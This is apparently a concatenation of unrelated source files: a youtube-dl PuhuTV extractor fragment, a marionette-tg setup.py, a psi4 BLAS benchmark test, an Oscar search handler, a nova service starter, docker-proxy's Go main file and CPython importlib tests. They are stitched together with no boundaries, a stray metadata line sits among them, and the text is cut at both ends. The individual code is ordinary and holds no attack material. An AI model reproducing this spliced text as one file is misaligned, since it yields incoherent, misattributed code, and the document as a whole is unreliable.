            if video.get('stream_type') == 'hls' and playlist is True:
                formats.extend(self._extract_m3u8_formats(
                    media_url, video_id, 'mp4', entry_protocol='m3u8_native',
                    m3u8_id='hls', fatal=False))
                continue
            quality = int_or_none(video.get('quality'))
            f = {
                'url': media_url,
                'ext': 'mp4',
                'height': quality
            }
            video_format = video.get('video_format')
            if video_format == 'hls' and playlist is False:
                # Single-variant HLS stream
                format_id = 'hls'
                f['protocol'] = 'm3u8_native'
            elif video_format == 'mp4':
                format_id = 'http'
            else:
                # Unknown/unsupported format type: skip
                continue
            if quality:
                format_id += '-%sp' % quality
            f['format_id'] = format_id
            formats.append(f)
        self._sort_formats(formats)

        description = try_get(
            info, lambda x: x['title']['description'],
            compat_str) or info.get('description')
        timestamp = unified_timestamp(info.get('created_at'))
        creator = try_get(
            info, lambda x: x['title']['producer']['name'], compat_str)

        duration = float_or_none(
            try_get(info, lambda x: x['content']['duration_in_ms'], int),
            scale=1000)
        view_count = try_get(info, lambda x: x['content']['watch_count'], int)

        # Thumbnails: one entry per size key ('main', '1920x1080', ...)
        images = try_get(
            info, lambda x: x['content']['images']['wide'], dict) or {}
        thumbnails = []
        for image_id, image_url in images.items():
            if not isinstance(image_url, compat_str):
                continue
            if not image_url.startswith(('http', '//')):
                image_url = 'https://%s' % image_url
            t = parse_resolution(image_id)
            t.update({
                'id': image_id,
                'url': image_url
            })
            thumbnails.append(t)

        release_year = try_get(info, lambda x: x['title']['released_at'], int)

        season_number = int_or_none(info.get('season_number'))
        season_id = str_or_none(info.get('season_id'))
        episode_number = int_or_none(info.get('episode_number'))

        tags = []
        for genre in try_get(info, lambda x: x['title']['genres'], list) or []:
            if not isinstance(genre, dict):
                continue
            genre_name = genre.get('name')
            if genre_name and isinstance(genre_name, compat_str):
                tags.append(genre_name)

        subtitles = {}
        for subtitle in try_get(
                info, lambda x: x['content']['subtitles'], list) or []:
            if not isinstance(subtitle, dict):
                continue
            lang = subtitle.get('language')
            sub_url = url_or_none(subtitle.get('url'))
            if not lang or not isinstance(lang, compat_str) or not sub_url:
                continue
            # Unknown language names are kept verbatim as the key
            subtitles[self._SUBTITLE_LANGS.get(lang, lang)] = [{
                'url': sub_url
            }]

        return {
            'id': video_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'season_id': season_id,
            'season_number': season_number,
            'episode_number': episode_number,
            'release_year': release_year,
            'timestamp': timestamp,
            'creator': creator,
            'view_count': view_count,
            'duration': duration,
            'tags': tags,
            'subtitles': subtitles,
            'thumbnails': thumbnails,
            'formats': formats
        }
class PuhuTVSerieIE(InfoExtractor):
    # Series "detail" pages, e.g. https://puhutv.com/deniz-yildizi-detay
    _VALID_URL = r'https?://(?:www\.)?puhutv\.com/(?P<id>[^/?#&]+)-detay'
    IE_NAME = 'puhutv:serie'
    _TESTS = [{
        'url': 'https://puhutv.com/deniz-yildizi-detay',
        'info_dict': {
            'title': 'Deniz Yıldızı',
            'id': 'deniz-yildizi',
        },
        'playlist_mincount': 205,
    }, {
        # a film detail page which is using same url with serie page
        'url': 'https://puhutv.com/kaybedenler-kulubu-detay',
        'only_matching': True,
    }]

    def _extract_entries(self, seasons):
        # Yield a url_result entry (handled by PuhuTVIE) for every episode
        # of every season, following the API pagination (40 per page,
        # until 'hasMore' is no longer True).
        for season in seasons:
            season_id = season.get('id')
            if not season_id:
                continue
            page = 1
            has_more = True
            while has_more is True:
                season = self._download_json(
                    'https://galadriel.puhutv.com/seasons/%s' % season_id,
                    season_id, 'Downloading page %s' % page, query={
                        'page': page,
                        'per': 40,
                    })
                episodes = season.get('episodes')
                if isinstance(episodes, list):
                    for ep in episodes:
                        slug_path = str_or_none(ep.get('slugPath'))
                        if not slug_path:
                            continue
                        video_id = str_or_none(int_or_none(ep.get('id')))
                        yield self.url_result(
                            'https://puhutv.com/%s' % slug_path,
                            ie=PuhuTVIE.ie_key(), video_id=video_id,
                            video_title=ep.get('name') or ep.get('eventLabel'))
                page += 1
                has_more = season.get('hasMore')

    def _real_extract(self, url):
        playlist_id = self._match_id(url)

        info = self._download_json(
            urljoin(url, '/api/slug/%s-detay' % playlist_id),
            playlist_id)['data']

        seasons = info.get('seasons')
        if seasons:
            return self.playlist_result(
                self._extract_entries(seasons), playlist_id, info.get('name'))

        # For films, these are using same url with series
        video_id = info.get('slug') or info['assets'][0]['slug']
        return self.url_result(
            'https://puhutv.com/%s-izle' % video_id,
            PuhuTVIE.ie_key(), video_id)
#!/usr/bin/env python
# coding: utf-8
# openbsd python setup.py
"""Packaging script for marionette-tg (layerProx rebuild of marionette)."""
import os

from setuptools import setup

# py2exe registers the "py2exe" distutils command needed to build the
# Windows executables listed in console=; it is only importable on Windows.
if os.name == 'nt':
    import py2exe

setup(name='marionette-tg',
      console=['bin/marionette_client', 'bin/marionette_server'],
      scripts=['bin/marionette_client', 'bin/marionette_server'],
      test_suite='marionette_tg',
      packages=['marionette_tg', 'marionette_tg.plugins', 'marionette_tg.executables'],
      package_data={'marionette_tg': ['marionette.conf', 'formats/*.mar', 'formats/*.py']},
      zipfile="marionette.zip",
      options={"py2exe": {
          "bundle_files": 2,
          "optimize": 0,
          "compressed": True,
          "includes": [
              'marionette_tg.plugins._channel',
              'marionette_tg.plugins._fte',
              'marionette_tg.plugins._io',
              'marionette_tg.plugins._model',
              'marionette_tg.plugins._tg',
          ],
          "dll_excludes": ["w9xpopen.exe"],
      }
      },
      include_package_data=True,
      # Fix: was install_requires=[''] -- an empty-string entry is not a
      # valid requirement specifier and breaks dependency resolution with
      # modern setuptools/pip.  No runtime dependencies are declared.
      install_requires=[],
      version='0.0.3',
      description='Marionette rebuild',
      long_description='layerProx rebuild of marionette',
      author='Filip kalebo',
      author_email='flipchan@riseup.net',
      url='https://github.com/flipchan/layerProx')
import time
import pytest
import numpy as np
import multiprocessing
import psi4
# Test below is fine on its own but erratic through pytest. Most likely
# to succeed as first test collected, so here it lies.
@pytest.mark.xfail(True, reason='threading treatment suspect', run=True)
def disabled_test_threaded_blas():
    """
    Benchmark Psi4's Matrix.gemm against numpy.dot for several matrix
    sizes at 1 thread and at half the machine's core count, then assert
    that (a) Psi4 at max threads is roughly on par with NumPy and
    (b) Psi4 scales roughly linearly with the thread count.
    """
    threads = multiprocessing.cpu_count()
    threads = int(threads / 2)

    times = {}
    size = [200, 500, 2000, 5000]
    threads = [1, threads]

    for th in threads:
        psi4.set_num_threads(th)

        for sz in size:
            # Repeat small problems so each timing covers ~1e10 flops
            nruns = max(1, int(1.e10 / (sz ** 3)))

            a = psi4.core.Matrix(sz, sz)
            b = psi4.core.Matrix(sz, sz)
            c = psi4.core.Matrix(sz, sz)

            # Time Psi4's gemm
            tp4 = time.time()
            for n in range(nruns):
                c.gemm(False, False, 1.0, a, b, 0.0)
            retp4 = (time.time() - tp4) / nruns

            # Time NumPy's dot on views of the same matrices
            tnp = time.time()
            for n in range(nruns):
                np.dot(a, b, out=np.asarray(c))
            retnp = (time.time() - tnp) / nruns
            print("Time for threads %2d, size %5d: Psi4: %12.6f NumPy: %12.6f" % (th, sz, retp4, retnp))
            if sz == 5000:
                # Only the largest size enters the ratio checks below
                times["p4-n{}".format(th)] = retp4
                times["np-n{}".format(th)] = retnp
                assert psi4.get_num_threads() == th

    # NumPy vs Psi4 at max threads (want ~1), and Psi4 scaling with
    # threads (want ~thread count)
    rat1 = times["np-n" + str(threads[-1])] / times["p4-n" + str(threads[-1])]
    rat2 = times["p4-n" + str(threads[0])] / times["p4-n" + str(threads[-1])]
    print("  NumPy@n%d : Psi4@n%d ratio (want ~1): %.2f" % (threads[-1], threads[-1], rat1))
    print("  Psi4@n%d : Psi4@n%d ratio (want ~%d): %.2f" % (threads[0], threads[-1], threads[-1], rat2))
    assert pytest.approx(rat1, 0.2) == 1.0
    assert pytest.approx(rat2, 0.8) == threads[-1]
from django.core.paginator import InvalidPage, Paginator
from django.utils.translation import ugettext_lazy as _
from haystack import connections
from oscar.core.loading import get_class
from . import facets
FacetMunger = get_class('search.facets', 'FacetMunger')
class SearchHandler(object):
    """
    A class that is concerned with performing a search and paginating the
    results. The search is triggered upon initialisation (mainly to have a
    predictable point to process any errors).  Search results are cached, so
    they can be accessed multiple times without incurring any overhead.

    The raison d'etre for this third way to interface with Haystack is
    two-fold. The Haystack search form doesn't do enough for our needs, and
    basing a view off a Haystack search view is unnecessarily invasive.
    Furthermore, using our own search handler means it is easy to swap
    out Haystack, which has been considered before.

    Usage:

        handler = SearchHandler(request.GET, request.get_full_path)
        found_objects = handler.get_paginated_objects()
        context = handler.get_search_context_data()

    Error handling:

        You need to catch an InvalidPage exception which gets thrown when an
        invalid page number is supplied.
    """

    form_class = None
    model_whitelist = None
    paginate_by = None
    paginator_class = Paginator
    page_kwarg = 'page'

    def __init__(self, request_data, full_path):
        self.full_path = full_path
        self.request_data = request_data
        # Triggers the search.
        search_queryset = self.get_search_queryset()
        self.search_form = self.get_search_form(
            request_data, search_queryset)
        self.results = self.get_search_results(self.search_form)
        # If below raises an UnicodeDecodeError, you're running pysolr < 3.2
        # with Solr 4.
        self.paginator, self.page = self.paginate_queryset(
            self.results, request_data)

    # Search related methods

    def get_search_results(self, search_form):
        """
        Perform the actual search using Haystack's search form. Returns
        a SearchQuerySet. The SQS is empty if the form is invalid.
        """
        return search_form.search()

    def get_search_form(self, request_data, search_queryset):
        """
        Return a bound version of Haystack's search form.
        """
        kwargs = {
            'data': request_data,
            'selected_facets': request_data.getlist("selected_facets"),
            'searchqueryset': search_queryset
        }
        return self.form_class(**kwargs)

    def get_search_queryset(self):
        """
        Returns the search queryset that is used as a base for the search.
        """
        sqs = facets.base_sqs()
        if self.model_whitelist:
            # Limit queryset to specified list of models
            sqs = sqs.models(*self.model_whitelist)
        return sqs

    # Pagination related methods

    def paginate_queryset(self, queryset, request_data):
        """
        Paginate the search results. This is a simplified version of
        Django's MultipleObjectMixin.paginate_queryset
        """
        paginator = self.get_paginator(queryset)
        page_kwarg = self.page_kwarg
        page = request_data.get(page_kwarg, 1)
        try:
            page_number = int(page)
        except ValueError:
            if page == 'last':
                page_number = paginator.num_pages
            else:
                raise InvalidPage(_(
                    "Page is not 'last', nor can it be converted to an int."))
        # This can also raise an InvalidPage exception.
        return paginator, paginator.page(page_number)

    def get_paginator(self, queryset):
        """
        Return a paginator. Override this to set settings like orphans,
        allow_empty, etc.
        """
        return self.paginator_class(queryset, self.paginate_by)

    # Accessing the search results and meta data

    def bulk_fetch_results(self, paginated_results):
        """
        This method gets paginated search results and returns a list of Django
        objects in the same order.

        It preserves the order without doing any ordering in Python, even
        when more than one Django model are returned in the search results. It
        also uses the same queryset that was used to populate the search
        queryset, so any select_related/prefetch_related optimisations are
        in effect.

        It is heavily based on Haystack's SearchQuerySet.post_process_results,
        but works on the paginated results instead of all of them.
        """
        objects = []

        # Fix: the original bound both names to the SAME dict
        # (``models_pks = loaded_objects = {}``), so the pk lists and the
        # fetched objects shared storage and only worked by accident of
        # evaluation order.  Use two independent dicts.
        models_pks = {}     # model class -> list of pks in result order
        loaded_objects = {}  # model class -> {pk: instance}
        for result in paginated_results:
            models_pks.setdefault(result.model, []).append(result.pk)

        search_backend_alias = self.results.query.backend.connection_alias
        for model in models_pks:
            # Use the index's read_queryset so select_related/
            # prefetch_related optimisations apply
            ui = connections[search_backend_alias].get_unified_index()
            index = ui.get_index(model)
            queryset = index.read_queryset(using=search_backend_alias)
            loaded_objects[model] = queryset.in_bulk(models_pks[model])

        for result in paginated_results:
            model_objects = loaded_objects.get(result.model, {})
            try:
                result._object = model_objects[int(result.pk)]
            except KeyError:
                # The object was either deleted since we indexed or should
                # be ignored; fail silently.
                pass
            else:
                objects.append(result._object)
        return objects

    def get_paginated_objects(self):
        """
        Return a paginated list of Django model instances. The call is cached.
        """
        if hasattr(self, '_objects'):
            return self._objects
        else:
            paginated_results = self.page.object_list
            self._objects = self.bulk_fetch_results(paginated_results)
        return self._objects

    def get_facet_munger(self):
        """
        Return the FacetMunger used to reshape Haystack's facet counts.
        """
        return FacetMunger(
            self.full_path,
            self.search_form.selected_multi_facets,
            self.results.facet_counts())

    def get_search_context_data(self, context_object_name=None):
        """
        Return metadata about the search in a dictionary useful to populate
        template contexts. If you pass in a context_object_name, the dictionary
        will also contain the actual list of found objects.

        The expected usage is to call this function in your view's
        get_context_data:

            search_context = self.search_handler.get_search_context_data(
                self.context_object_name)
            context.update(search_context)
            return context

        """
        # Use the FacetMunger to convert Haystack's awkward facet data into
        # something the templates can use.
        # Note that the FacetMunger accesses object_list (unpaginated results),
        # whereas we use the paginated search results to populate the context
        # with products
        munger = self.get_facet_munger()
        facet_data = munger.facet_data()
        has_facets = any([data['results'] for data in facet_data.values()])

        context = {
            'facet_data': facet_data,
            'has_facets': has_facets,
            # This is a serious code smell; we just pass through the selected
            # facets data to the view again, and the template adds those
            # as fields to the form. This hack ensures that facets stay
            # selected when changing relevancy.
            'selected_facets': self.request_data.getlist('selected_facets'),
            'form': self.search_form,
            'paginator': self.paginator,
            'page_obj': self.page,
        }

        # It's a pretty common pattern to want the actual results in the
        # context, so pass them in if context_object_name is set.
        if context_object_name is not None:
            context[context_object_name] = self.get_paginated_objects()

        return context
# Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo_config import cfg
from oslo_log import log as logging
from nova import config
from nova.i18n import _LE
from nova import objects
from nova.objectstore import s3server
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
# Register the conductor and API options that main() reads below
# (CONF.conductor.*, CONF.enabled_apis, CONF.enabled_ssl_apis), even if the
# modules that declare them have not been imported yet.
CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
    """Start every enabled nova service inside a single process.

    Failures to launch any individual service are logged and the remaining
    services are still attempted; the function finally blocks in
    launcher.wait() until the launcher shuts down.
    """
    # Order matters here: CLI/config parsing must happen before logging is
    # configured, and monkey patching / object registration before any
    # service is created.
    config.parse_args(sys.argv)
    logging.setup(CONF, "nova")
    LOG = logging.getLogger('nova.all')
    utils.monkey_patch()
    objects.register_all()
    launcher = service.process_launcher()
    # nova-api
    for api in CONF.enabled_apis:
        try:
            should_use_ssl = api in CONF.enabled_ssl_apis
            server = service.WSGIService(api, use_ssl=should_use_ssl)
            launcher.launch_service(server, workers=server.workers or 1)
        except (Exception, SystemExit):
            # Deliberately broad: one broken API must not stop the others.
            LOG.exception(_LE('Failed to load %s-api'), api)
    # Auxiliary WSGI servers: S3 objectstore and XVP VNC proxy.
    for mod in [s3server, xvp_proxy]:
        try:
            launcher.launch_service(mod.get_wsgi_server())
        except (Exception, SystemExit):
            LOG.exception(_LE('Failed to load %s'), mod.__name__)
    for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
                   'nova-cert', 'nova-conductor']:
        # FIXME(sirp): Most service configs are defined in nova/service.py, but
        # conductor has set a new precedent of storing these configs
        # nova/<service>/api.py.
        #
        # We should update the existing services to use this new approach so we
        # don't have to treat conductor differently here.
        if binary == 'nova-conductor':
            topic = CONF.conductor.topic
            manager = CONF.conductor.manager
        else:
            topic = None
            manager = None
        try:
            launcher.launch_service(service.Service.create(binary=binary,
                                                           topic=topic,
                                                           manager=manager))
        except (Exception, SystemExit):
            LOG.exception(_LE('Failed to load %s'), binary)
    launcher.wait()
package main
import (
"flag"
"fmt"
"net"
"os"
"os/signal"
"syscall"
"github.com/ishidawataru/sctp"
"github.com/moby/moby/v2/dockerversion"
"golang.org/x/net/ipv4"
"golang.org/x/net/ipv6"
)
// The caller is expected to pass-in open file descriptors ...
const (
	// Pipe for reporting status, as a string. "0\n" if the proxy
	// started normally. "1\n<error message>" otherwise.
	parentPipeFd uintptr = 3 + iota
	// If -use-listen-fd=true, a listening socket ready to accept TCP
	// connections or receive UDP. (Without that option on the command
	// line, the listener needs to be opened by docker-proxy, for
	// compatibility with older docker daemons. In this case fd 4
	// may belong to the Go runtime.)
	listenSockFd // fd 4
)
// main wires up the proxy described by the command line / inherited file
// descriptors, reports startup status to the parent over the fd-3 pipe
// ("0\n" on success, "1\n<error>" on failure), then runs the proxy until
// it is stopped by a signal.
func main() {
	// Mark any files we expect to inherit as close-on-exec
	// so that they are not unexpectedly inherited by any child processes
	// if we ever need docker-proxy to exec something.
	// This is safe to do even if the fd belongs to the Go runtime
	// as it would be a no-op:
	// the Go runtime marks all file descriptors it opens as close-on-exec.
	// See the godoc for syscall.ForkLock for more information.
	syscall.CloseOnExec(int(parentPipeFd))
	syscall.CloseOnExec(int(listenSockFd))
	config := parseFlags()
	p, err := newProxy(config)
	if config.ListenSock != nil {
		// net.FileListener/FilePacketConn duplicate the fd, so the
		// inherited file can be closed here whether or not newProxy
		// succeeded.
		config.ListenSock.Close()
	}
	_ = syscall.SetNonblock(int(parentPipeFd), true)
	f := os.NewFile(parentPipeFd, "signal-parent")
	if err != nil {
		fmt.Fprintf(f, "1\n%s", err)
		f.Close()
		os.Exit(1)
	}
	// Install the signal handler before telling the parent we are up, so a
	// prompt SIGTERM cannot be missed.
	go handleStopSignals(p)
	fmt.Fprint(f, "0\n")
	f.Close()
	// Run will block until the proxy stops
	p.Run()
}
// newProxy builds the concrete Proxy implementation (TCP, UDP or SCTP)
// described by config. It either adopts the listen socket inherited from the
// daemon (config.ListenSock, fd 4) or, for older daemons that do not pass a
// socket, opens a fresh listener on HostIP:HostPort.
func newProxy(config ProxyConfig) (p Proxy, err error) {
	// Pick the address family suffix ("4"/"6") from the host IP.
	ipv := ip4
	if config.HostIP.To4() == nil {
		ipv = ip6
	}
	switch config.Proto {
	case "tcp":
		var listener *net.TCPListener
		if config.ListenSock == nil {
			// Fall back to HostIP:HostPort if no socket on fd 4, for compatibility with older daemons.
			hostAddr := &net.TCPAddr{IP: config.HostIP, Port: config.HostPort}
			listener, err = net.ListenTCP("tcp"+string(ipv), hostAddr)
			if err != nil {
				return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
			}
		} else {
			l, err := net.FileListener(config.ListenSock)
			if err != nil {
				return nil, err
			}
			var ok bool
			listener, ok = l.(*net.TCPListener)
			if !ok {
				// The daemon handed us a socket of the wrong type.
				return nil, fmt.Errorf("unexpected socket type for listener fd: %s", l.Addr().Network())
			}
		}
		container := &net.TCPAddr{IP: config.ContainerIP, Port: config.ContainerPort}
		p, err = NewTCPProxy(listener, container)
	case "udp":
		var listener *net.UDPConn
		if config.ListenSock == nil {
			// Fall back to HostIP:HostPort if no socket on fd 4, for compatibility with older daemons.
			hostAddr := &net.UDPAddr{IP: config.HostIP, Port: config.HostPort}
			listener, err = net.ListenUDP("udp"+string(ipv), hostAddr)
			if err != nil {
				return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
			}
			// We need to setsockopt(IP_PKTINFO) on the listener to get the destination address as an ancillary
			// message. The daddr will be used as the source address when sending back replies coming from the
			// container to the client. If we don't do this, the kernel will have to pick a source address for us, and
			// it might not pick what the client expects. That would result in ICMP Port Unreachable.
			if ipv == ip4 {
				pc := ipv4.NewPacketConn(listener)
				if err := pc.SetControlMessage(ipv4.FlagDst, true); err != nil {
					return nil, fmt.Errorf("failed to setsockopt(IP_PKTINFO): %w", err)
				}
			} else {
				pc := ipv6.NewPacketConn(listener)
				if err := pc.SetControlMessage(ipv6.FlagDst, true); err != nil {
					return nil, fmt.Errorf("failed to setsockopt(IPV6_RECVPKTINFO): %w", err)
				}
			}
		} else {
			// NOTE(review): when the socket is inherited, IP_PKTINFO is
			// presumably already configured by the daemon — confirm.
			l, err := net.FilePacketConn(config.ListenSock)
			if err != nil {
				return nil, err
			}
			var ok bool
			listener, ok = l.(*net.UDPConn)
			if !ok {
				return nil, fmt.Errorf("unexpected socket type for listener fd: %s", l.LocalAddr().Network())
			}
		}
		container := &net.UDPAddr{IP: config.ContainerIP, Port: config.ContainerPort}
		p, err = NewUDPProxy(listener, container, ipv)
	case "sctp":
		var listener *sctp.SCTPListener
		if config.ListenSock == nil {
			hostAddr := &sctp.SCTPAddr{IPAddrs: []net.IPAddr{{IP: config.HostIP}}, Port: config.HostPort}
			listener, err = sctp.ListenSCTP("sctp"+string(ipv), hostAddr)
			if err != nil {
				return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
			}
		} else {
			if listener, err = sctp.FileListener(config.ListenSock); err != nil {
				return nil, err
			}
		}
		container := &sctp.SCTPAddr{IPAddrs: []net.IPAddr{{IP: config.ContainerIP}}, Port: config.ContainerPort}
		p, err = NewSCTPProxy(listener, container)
	default:
		return nil, fmt.Errorf("unsupported protocol %s", config.Proto)
	}
	return p, err
}
// ProxyConfig collects the command-line parameters describing a single
// port-forwarding proxy instance. See parseFlags.
type ProxyConfig struct {
	// Proto is the transport protocol to proxy: "tcp", "udp" or "sctp".
	Proto string
	HostIP, ContainerIP net.IP
	HostPort, ContainerPort int
	// ListenSock is the pre-opened listen socket inherited on fd 4 when
	// -use-listen-fd is given; nil otherwise.
	ListenSock *os.File
}
// parseFlags parses the flags passed on reexec to create the TCP/UDP/SCTP
// net.Addrs to map the host and container ports.
// With -v/-version it prints version information and exits; with
// -use-listen-fd it adopts the inherited socket on listenSockFd.
func parseFlags() ProxyConfig {
	var (
		config ProxyConfig
		useListenFd bool
		printVer bool
	)
	flag.StringVar(&config.Proto, "proto", "tcp", "proxy protocol")
	// net.IP satisfies encoding.TextUnmarshaler, so TextVar parses the
	// textual IP notation straight into the config fields.
	flag.TextVar(&config.HostIP, "host-ip", net.IPv4zero, "host ip")
	flag.IntVar(&config.HostPort, "host-port", -1, "host port")
	flag.TextVar(&config.ContainerIP, "container-ip", net.IPv4zero, "container ip")
	flag.IntVar(&config.ContainerPort, "container-port", -1, "container port")
	flag.BoolVar(&useListenFd, "use-listen-fd", false, "use a supplied listen fd")
	flag.BoolVar(&printVer, "v", false, "print version information and quit")
	flag.BoolVar(&printVer, "version", false, "print version information and quit")
	flag.Parse()
	if printVer {
		fmt.Printf("docker-proxy (commit %s) version %s\n", dockerversion.GitCommit, dockerversion.Version)
		os.Exit(0)
	}
	if useListenFd {
		// Switch the inherited fd to non-blocking mode before wrapping it
		// in an *os.File.
		_ = syscall.SetNonblock(int(listenSockFd), true)
		config.ListenSock = os.NewFile(listenSockFd, "listen-sock")
	}
	return config
}
func handleStopSignals(p Proxy) {
s := make(chan os.Signal, 10)
signal.Notify(s, os.Interrupt, syscall.SIGTERM)
for range s {
p.Close()
os.Exit(0)
}
} | go | github | https://github.com/moby/moby | cmd/docker-proxy/main_linux.go |
from . import util
abc = util.import_importlib('importlib.abc')
init = util.import_importlib('importlib')
machinery = util.import_importlib('importlib.machinery')
importlib_util = util.import_importlib('importlib.util')
import os
import string
import sys
from test import support
import types
import unittest
import warnings
class DecodeSourceBytesTests:
    """Tests for importlib.util.decode_source()."""
    # Sample source containing a non-ASCII character so the chosen
    # encoding actually matters.
    source = "string ='ü'"
    def test_ut8_default(self):
        # With no coding cookie, decode_source() must assume UTF-8.
        source_bytes = self.source.encode('utf-8')
        self.assertEqual(self.util.decode_source(source_bytes), self.source)
    def test_specified_encoding(self):
        # A PEP 263 coding cookie overrides the UTF-8 default.
        source = '# coding=latin-1\n' + self.source
        source_bytes = source.encode('latin-1')
        assert source_bytes != source.encode('utf-8')
        self.assertEqual(self.util.decode_source(source_bytes), source)
    def test_universal_newlines(self):
        # \r\n line endings are normalised to \n.
        source = '\r\n'.join([self.source, self.source])
        source_bytes = source.encode('utf-8')
        self.assertEqual(self.util.decode_source(source_bytes),
                         '\n'.join([self.source, self.source]))
(Frozen_DecodeSourceBytesTests,
 Source_DecodeSourceBytesTests
 ) = util.test_both(DecodeSourceBytesTests, util=importlib_util)
class ModuleFromSpecTests:
    """Tests for importlib.util.module_from_spec()."""
    def test_no_create_module(self):
        # A loader lacking create_module() still produces a module, but
        # emits a DeprecationWarning naming the missing method.
        class Loader:
            def exec_module(self, module):
                pass
        spec = self.machinery.ModuleSpec('test', Loader())
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always')
            module = self.util.module_from_spec(spec)
        self.assertEqual(1, len(w))
        self.assertTrue(issubclass(w[0].category, DeprecationWarning))
        self.assertIn('create_module', str(w[0].message))
        self.assertIsInstance(module, types.ModuleType)
        self.assertEqual(module.__name__, spec.name)
    def test_create_module_returns_None(self):
        # create_module() returning None means "use the default module".
        class Loader(self.abc.Loader):
            def create_module(self, spec):
                return None
        spec = self.machinery.ModuleSpec('test', Loader())
        module = self.util.module_from_spec(spec)
        self.assertIsInstance(module, types.ModuleType)
        self.assertEqual(module.__name__, spec.name)
    def test_create_module(self):
        # A custom module returned by create_module() is used as-is; its
        # pre-set __name__ must not be overwritten.
        name = 'already set'
        class CustomModule(types.ModuleType):
            pass
        class Loader(self.abc.Loader):
            def create_module(self, spec):
                module = CustomModule(spec.name)
                module.__name__ = name
                return module
        spec = self.machinery.ModuleSpec('test', Loader())
        module = self.util.module_from_spec(spec)
        self.assertIsInstance(module, CustomModule)
        self.assertEqual(module.__name__, name)
    # The remaining tests verify that each import-related attribute is
    # populated on the new module from the corresponding spec field.
    def test___name__(self):
        spec = self.machinery.ModuleSpec('test', object())
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__name__, spec.name)
    def test___spec__(self):
        spec = self.machinery.ModuleSpec('test', object())
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__spec__, spec)
    def test___loader__(self):
        loader = object()
        spec = self.machinery.ModuleSpec('test', loader)
        module = self.util.module_from_spec(spec)
        self.assertIs(module.__loader__, loader)
    def test___package__(self):
        spec = self.machinery.ModuleSpec('test.pkg', object())
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__package__, spec.parent)
    def test___path__(self):
        spec = self.machinery.ModuleSpec('test', object(), is_package=True)
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__path__, spec.submodule_search_locations)
    def test___file__(self):
        # __file__ is only set when the spec claims a concrete location.
        spec = self.machinery.ModuleSpec('test', object(), origin='some/path')
        spec.has_location = True
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__file__, spec.origin)
    def test___cached__(self):
        spec = self.machinery.ModuleSpec('test', object())
        spec.cached = 'some/path'
        spec.has_location = True
        module = self.util.module_from_spec(spec)
        self.assertEqual(module.__cached__, spec.cached)
(Frozen_ModuleFromSpecTests,
 Source_ModuleFromSpecTests
 ) = util.test_both(ModuleFromSpecTests, abc=abc, machinery=machinery,
                    util=importlib_util)
class ModuleForLoaderTests:
    """Tests for importlib.util.module_for_loader."""
    @classmethod
    def module_for_loader(cls, func):
        # Wrap the deprecated decorator while suppressing its own
        # DeprecationWarning, so individual tests stay quiet.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DeprecationWarning)
            return cls.util.module_for_loader(func)
    def test_warning(self):
        # Should raise a PendingDeprecationWarning when used.
        with warnings.catch_warnings():
            warnings.simplefilter('error', DeprecationWarning)
            with self.assertRaises(DeprecationWarning):
                func = self.util.module_for_loader(lambda x: x)
    def return_module(self, name):
        # Helper: load `name` through a wrapped loader that just returns
        # the module handed to it.
        fxn = self.module_for_loader(lambda self, module: module)
        return fxn(self, name)
    def raise_exception(self, name):
        # Helper: load `name` through a wrapped loader that always fails,
        # swallowing the resulting ImportError.
        def to_wrap(self, module):
            raise ImportError
        fxn = self.module_for_loader(to_wrap)
        try:
            fxn(self, name)
        except ImportError:
            pass
    def test_new_module(self):
        # Test that when no module exists in sys.modules a new module is
        # created.
        module_name = 'a.b.c'
        with util.uncache(module_name):
            module = self.return_module(module_name)
            self.assertIn(module_name, sys.modules)
        self.assertIsInstance(module, types.ModuleType)
        self.assertEqual(module.__name__, module_name)
    def test_reload(self):
        # Test that a module is reused if already in sys.modules.
        class FakeLoader:
            def is_package(self, name):
                return True
            @self.module_for_loader
            def load_module(self, module):
                return module
        name = 'a.b.c'
        module = types.ModuleType('a.b.c')
        # Deliberately bogus values; the decorator must overwrite them.
        module.__loader__ = 42
        module.__package__ = 42
        with util.uncache(name):
            sys.modules[name] = module
            loader = FakeLoader()
            returned_module = loader.load_module(name)
            self.assertIs(returned_module, sys.modules[name])
            self.assertEqual(module.__loader__, loader)
            self.assertEqual(module.__package__, name)
    def test_new_module_failure(self):
        # Test that a module is removed from sys.modules if added but an
        # exception is raised.
        name = 'a.b.c'
        with util.uncache(name):
            self.raise_exception(name)
            self.assertNotIn(name, sys.modules)
    def test_reload_failure(self):
        # Test that a failure on reload leaves the module in-place.
        name = 'a.b.c'
        module = types.ModuleType(name)
        with util.uncache(name):
            sys.modules[name] = module
            self.raise_exception(name)
            self.assertIs(module, sys.modules[name])
    def test_decorator_attrs(self):
        # functools.wraps-style metadata must be preserved by the decorator.
        def fxn(self, module): pass
        wrapped = self.module_for_loader(fxn)
        self.assertEqual(wrapped.__name__, fxn.__name__)
        self.assertEqual(wrapped.__qualname__, fxn.__qualname__)
    def test_false_module(self):
        # If for some odd reason a module is considered false, still return it
        # from sys.modules.
        class FalseModule(types.ModuleType):
